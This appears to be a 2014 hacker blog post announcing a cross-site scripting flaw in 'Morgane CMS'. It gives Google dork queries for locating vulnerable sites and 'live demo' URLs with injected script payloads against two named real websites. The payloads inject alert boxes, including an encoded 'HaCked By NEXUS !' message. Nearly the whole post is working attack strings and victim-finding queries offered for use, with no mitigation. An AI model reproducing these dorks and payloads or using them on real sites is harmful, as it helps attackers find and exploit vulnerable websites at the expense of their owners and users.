Thursday, 3 July 2014

Morgane CMS - XSS Vulnerability

Dorks:
intext:"www.morgane.co.uk" inurl:"/main.php?sid="
intext:"www.morgane.co.uk" inurl:"/main.php?id=" 

 Use string to char.. Or use numbers..

Example & Live Demo:

String to char mode:
http://www.donkeyisland.org/main.php?id=505%22%3E%3Cscript%3Ealert%28String.fromCharCode%2872,%2097,%2067,%20107,%20101,%20100,%2032,%2066,%20121,%2032,%2078,%2069,%2088,%2085,%2083,%2032,%2033%29%29;%3C/script%3E
http://hospitality.wayout.net/en/main.php?sid=96%22%3E%3Cscript%3Ealert%28String.fromCharCode%2872,%2097,%2067,%20107,%20101,%20100,%2032,%2066,%20121,%2032,%2078,%2069,%2088,%2085,%2083,%2032,%2033%29%29;%3C/script%3E

Numbers mode (testing mode):
http://www.donkeyisland.org/main.php?id=505%22%3E%3Cscript%3Ealert%281337%29;%3C/script%3E
 http://hospitality.wayout.net/en/main.php?sid=96%22%3E%3Cscript%3Ealert%281337%29;%3C/script%3E
* Can run XSS only on Firefox not Google Chrome :D



NEXUS